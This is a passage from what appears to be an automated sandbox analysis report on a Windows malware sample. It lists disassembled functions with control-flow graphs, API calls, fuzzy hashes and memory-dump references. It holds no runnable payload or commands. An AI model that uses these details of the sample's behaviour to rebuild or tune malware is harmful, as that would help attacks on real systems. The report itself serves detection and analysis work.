                    • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040ADED
                    • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040ADFA
                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040AE0C
                    • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040AE19
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AE1E
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
                    • String ID: GetLongPathNameW$Kernel32.DLL
                    • API String ID: 1993255246-2943376620
                    • Opcode ID: b269ce3a440ba4175cabcfb75d30ea3c0961c0f40c5e72e3f128e2335a594a21
                    • Instruction ID: e37525813661028bcc8eb249af8eccfe35d88e27d7fdedfae3674fb0e28627f1
                    • Opcode Fuzzy Hash: b269ce3a440ba4175cabcfb75d30ea3c0961c0f40c5e72e3f128e2335a594a21
                    • Instruction Fuzzy Hash: FAF082722452547FC3216BB6AC8CEEB3EACDF86755300443AF905E2251EA7C5D2086BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B140 Relevance: 9.2, APIs: 6, Instructions: 157filememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 243 40b140-40b156 244 40b160-40b173 call 40db18 243->244 245 40b158 243->245 248 40b322-40b32b 244->248 249 40b179-40b180 244->249 245->244 250 40b182-40b18a 249->250 251 40b1be-40b1c1 249->251 252 40b191-40b197 250->252 253 40b18c 250->253 254 40b1c3-40b1cb 251->254 255 40b1fc-40b1ff 251->255 256 40b199 252->256 257 40b19c-40b1b9 CreateFileW 252->257 253->252 258 40b1d2-40b1d8 254->258 259 40b1cd 254->259 260 40b201-40b20d 255->260 261 40b268 255->261 256->257 264 40b26c-40b26f 257->264 265 40b1da 258->265 266 40b1dd-40b1fa CreateFileW 258->266 259->258 262 40b218-40b21e 260->262 263 40b20f-40b214 260->263 261->264 267 40b220-40b223 262->267 268 40b227-40b247 CreateFileW 262->268 263->262 269 40b275-40b277 264->269 270 40b30b 264->270 265->266 266->264 267->268 268->269 271 40b249-40b266 CreateFileW 268->271 269->270 273 40b27d-40b284 269->273 272 40b30f-40b312 270->272 271->264 274 40b314 272->274 275 40b316-40b31d call 40da8a 272->275 276 40b2a2 273->276 277 40b286-40b28c 273->277 274->275 275->248 280 40b2a5-40b2d2 276->280 277->276 279 40b28e-40b2a0 HeapAlloc 277->279 279->280 281 40b2f0-40b2f9 280->281 282 40b2d4-40b2da 280->282 283 40b2fb 281->283 284 40b2fd-40b2ff 281->284 282->281 285 40b2dc-40b2ea SetFilePointer 282->285 283->284 284->272 286 40b301-40b30a 284->286 285->281
                    APIs
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1B1
                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1F2
                    • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B23C
                    • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040B25E
                    • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040B297
                    • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040B2EA
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: File$Create$AllocHeapPointer
                    • String ID:
                    • API String ID: 4207849991-0
                    • Opcode ID: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
                    • Instruction ID: 8d8b4ccba24edc48a090e0818cc57ca2d498b7de68d829e88f81714118269cc7
                    • Opcode Fuzzy Hash: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
                    • Instruction Fuzzy Hash: D251B171244301ABE3208E15DC49B6BBAE5EB44764F24493EFD81A63E0D779E8458B8D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DE99 Relevance: 7.6, APIs: 5, Instructions: 106memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 287 40de99-40deb8 288 40deba-40debc 287->288 289 40debe-40dec0 287->289 288->289 290 40df72-40df85 RtlAllocateHeap 289->290 291 40dec6-40decb 289->291 293 40df87-40dfa5 290->293 294 40dfbd-40dfc3 290->294 292 40ded0 call 40e0c3 291->292 295 40ded5-40dee9 EnterCriticalSection 292->295 296 40dfb0-40dfb7 InitializeCriticalSection 293->296 297 40dfa7-40dfa9 293->297 298 40def7-40def9 295->298 296->294 297->296 299 40dfab-40dfae 297->299 300 40deeb-40deee 298->300 301 40defb 298->301 299->294 303 40def0-40def3 300->303 304 40def5 300->304 302 40df07-40df1b HeapAlloc 301->302 305 40df65-40df70 LeaveCriticalSection 302->305 306 40df1d-40df2f call 40de99 302->306 303->304 307 40defd-40df05 303->307 304->298 305->294 309 40df34-40df38 306->309 307->302 307->305 309->305 310 40df3a-40df5a 309->310 311 40df5c 310->311 312 40df5f 310->312 311->312 312->305
                    APIs
                    • EnterCriticalSection.KERNEL32(00418684,0041867C,0040E062,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DEDA
                    • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040DF11
                    • LeaveCriticalSection.KERNEL32(00418684,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DF6A
                    • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DF7B
                    • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DFB7
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                    • String ID:
                    • API String ID: 1272335518-0
                    • Opcode ID: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
                    • Instruction ID: e12e1174ac54fca87ec7e67201d5359a366fc17122bfc308660e030bf91fb77e
                    • Opcode Fuzzy Hash: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
                    • Instruction Fuzzy Hash: 90318D71940B069BC3208F95D844A52FBF0FB44720B19C93EE446A77A0DB78E908CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403F53 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 571COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 313 403f53-403f54 314 403f59-403f64 313->314 314->314 315 403f66-403f7c call 40e660 314->315 318 403f7e-403f86 315->318 319 403f88-403fea call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 318->319 320 403fec-403ffd 318->320 319->318 319->320 322 403fff-404007 320->322 324 404009-40406b call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 322->324 325 40406d-40407e 322->325 324->322 324->325 328 404080-404088 325->328 329 40408a-4040ec call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 328->329 330 4040ee-4040ff 328->330 329->328 329->330 335 404101-404109 330->335 340 40410b-40416d call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 335->340 341 40416f-404180 335->341 340->335 340->341 346 404182-40418a 341->346 351 4041f0-404201 346->351 352 40418c-4041e6 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 346->352 358 404203-40420b 351->358 471 4041eb-4041ee 352->471 364 404275-404286 358->364 365 40420d-404273 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 358->365 372 404288-404290 364->372 365->358 365->364 379 404292-4042f8 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 372->379 380 4042fa-40430b 372->380 379->372 379->380 388 40430d-404315 380->388 396 404317-404375 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 388->396 397 40437f-404390 388->397 500 40437a-40437d 396->500 399 404392-40439a 397->399 409 404404-4045ee call 40e520 call 40e6c0 * 2 call 40e560 call 40e520 call 403221 call 40e560 call 40985e GetModuleHandleW call 40e520 * 4 call 40d780 call 405182 call 405eb0 call 40e560 call 40e520 * 4 call 40d780 call 405182 call 405eb0 call 40e560 call 402e49 call 40e520 call 402150 call 4051a0 call 40196c call 40469c call 40e520 call 405100 call 403539 call 40e560 PathRemoveBackslashW call 402068 call 40e520 * 2 call 402ba6 call 40e720 call 405182 call 4099a5 call 4051a0 call 40e520 call 40e6c0 * 2 call 40e560 call 403801 call 40e520 call 401e66 call 40e560 399->409 410 40439c-404402 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 399->410 589 4045f0-404606 call 40548c 409->589 590 404608-40460c call 402c55 409->590 410->399 410->409 471->346 471->351 500->388 500->397 594 404611-404621 call 403c83 589->594 590->594 596 404626-40469b SetConsoleCtrlHandler call 401fba call 40e5f0 * 9 594->596
                    APIs
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,020A9F70,00000000,00000000), ref: 0040445B
                    • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00404554
                      • Part of subcall function 00402BA6: GetShortPathNameW.KERNEL32(020A9F70,020A9F70,00002710), ref: 00402BE0
                      • Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 004099A5: SetEnvironmentVariableW.KERNEL32(020A9F70,020A9F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                      • Part of subcall function 00401E66: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,004045DB,00000000,00000000,00000000,020A9F70,020A8968,00000000,00000000), ref: 00401E9B
                    • SetConsoleCtrlHandler.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,020A9F70,020A8968,00000000,00000000,00000000), ref: 00404636
                      • Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,020A9F70), ref: 004054A5
                      • Part of subcall function 0040548C: EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                      • Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                      • Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                      • Part of subcall function 0040548C: LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$Path$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseConsoleCreateCtrlEnterEnvironmentHandlerLeaveModuleNameObjectQuoteRemoveShortSingleSpacesThreadVariableWaitwcslen
                    • String ID: pA
                    • API String ID: 2577741277-3402996844
                    • Opcode ID: 50ce0f469a7665fb6dfd1afe813213fc97d1f4cade5af18fd151faefa158c23f
                    • Instruction ID: 999f5745f1e250978be3a13d4136388ffeb6a971fca5c6bbec0ef146a0a58392
                    • Opcode Fuzzy Hash: 50ce0f469a7665fb6dfd1afe813213fc97d1f4cade5af18fd151faefa158c23f
                    • Instruction Fuzzy Hash: 4712FAB5504304BED600BBB29C8197F77BCEB89718F10CC3FB544A6192EA3CD9559B2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C83 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                    • PathQuoteSpacesW.SHLWAPI(00000000,00000000,020A89E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404626,00000000,00000000,00000000,?), ref: 00403CE6
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                    • PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,0041702A,00000000,00000000,00000000,00000000,020A89E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403D1F
                      • Part of subcall function 0040AE75: GetCurrentDirectoryW.KERNEL32(00000104,00000000,00000104,00000000,?,?,0000000A,004037B6,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746), ref: 0040AE8B
                      • Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 004098F7: WaitForSingleObject.KERNEL32(020A9F70,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044), ref: 00409904
                      • Part of subcall function 004098F7: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,020A9F70,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?), ref: 00409921
                      • Part of subcall function 004056D8: timeBeginPeriod.WINMM(00000001,00403793,00000001,?,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000,00000000), ref: 004056E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$AllocateErrorHeapLastPathQuoteSpaces$BeginCurrentDirectoryNamedObjectPeekPeriodPipeSingleWaittimewcslen
                    • String ID: *pA$*pA
                    • API String ID: 2955313036-2893952571
                    • Opcode ID: 6f360bf5818642a08700f897070461880bdab54b83c1be6a7afe69dac29c3c04
                    • Instruction ID: 17d0f5624b42dd18ceef5440812bdbba4c8a787aaabb2d2d00a5c22853b10036
                    • Opcode Fuzzy Hash: 6f360bf5818642a08700f897070461880bdab54b83c1be6a7afe69dac29c3c04
                    • Instruction Fuzzy Hash: 4E41D875104205AAC600BF73DC8293F7669EFD4708F50CD3EB184361E2EA3D9D25AB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401BA0 Relevance: 4.7, APIs: 3, Instructions: 233libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                      • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                      • Part of subcall function 00409698: memmove.MSVCRT ref: 004096DA
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
                    • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
                    • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                    • String ID:
                    • API String ID: 983379767-0
                    • Opcode ID: 85bd719b3417c84e9721a3e665a4c187715772ca533533566ef874ce4e5cb792
                    • Instruction ID: 6d1e308804f6dc32779c3279b2fcfe03024d17212ecc119a6d6b7423f9e5f936
                    • Opcode Fuzzy Hash: 85bd719b3417c84e9721a3e665a4c187715772ca533533566ef874ce4e5cb792
                    • Instruction Fuzzy Hash: C951D7B66052007AE500BBB39D82D7F626DDBC571CB108C3FB440650E3EA3D9D616A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B6A0 Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 848 40b6a0-40b6b4 849 40b7a7-40b7ad 848->849 850 40b6ba-40b6be 848->850 851 40b6c0-40b6e8 SetFilePointer 850->851 852 40b6eb-40b6f5 850->852 851->852 853 40b6f7-40b702 852->853 854 40b768-40b773 call 40b0c0 852->854 855 40b753-40b765 853->855 856 40b704-40b705 853->856 863 40b795-40b7a2 854->863 864 40b775-40b792 WriteFile 854->864 858 40b707-40b70a 856->858 859 40b73c-40b750 856->859 861 40b727-40b739 858->861 862 40b70c-40b70d 858->862 865 40b711-40b724 memcpy 862->865 863->865
                    APIs
                    • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B6D8
                    • memcpy.MSVCRT ref: 0040B712
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FilePointermemcpy
                    • String ID:
                    • API String ID: 1104741977-0
                    • Opcode ID: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
                    • Instruction ID: c1513f54f6ae5569788c36180188ddc2abd705510cfe10eedfb0010ba837d0d9
                    • Opcode Fuzzy Hash: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
                    • Instruction Fuzzy Hash: DA312A3A2047019FC320DF29D844E9BB7E5EFD8714F04882EE59A97750D335E919CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E900 Relevance: 4.6, APIs: 3, Instructions: 75memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 866 40e900-40e919 TlsGetValue 867 40e924-40e93f 866->867 868 40e91b-40e921 866->868 869 40e941-40e972 RtlReAllocateHeap 867->869 870 40e974-40e97e 867->870 868->867 871 40e9bc-40e9dc 869->871 870->871 872 40e980-40e987 870->872 873 40e990-40e9ba HeapReAlloc 872->873 874 40e989 872->874 873->871 874->873
                    APIs
                    • TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                    • RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E967
                    • HeapReAlloc.KERNEL32(020A0000,00000000,?,000FFFF6), ref: 0040E9B1
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$AllocAllocateValue
                    • String ID:
                    • API String ID: 1566162415-0
                    • Opcode ID: 2f886b1653eeaf8e6e176882be529ab5a4d9cbf2fb84908f11b91f3f387303a9
                    • Instruction ID: 5ee2f831fd0b69a5072d4afb15d4d8d3f7e606a336c6d63425544261b24b472a
                    • Opcode Fuzzy Hash: 2f886b1653eeaf8e6e176882be529ab5a4d9cbf2fb84908f11b91f3f387303a9
                    • Instruction Fuzzy Hash: 35319674A00108EFCB00CF98D594A9DBBF5FB48314F24C1A9E855AB395D731AE51DF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E560 Relevance: 4.6, APIs: 3, Instructions: 53memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 875 40e560-40e587 TlsGetValue 876 40e5a6-40e5c5 RtlReAllocateHeap 875->876 877 40e589-40e5a4 RtlAllocateHeap 875->877 878 40e5c7-40e5ed call 40ea40 876->878 877->878
                    APIs
                    • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                    • RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                    • RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateHeap$Value
                    • String ID:
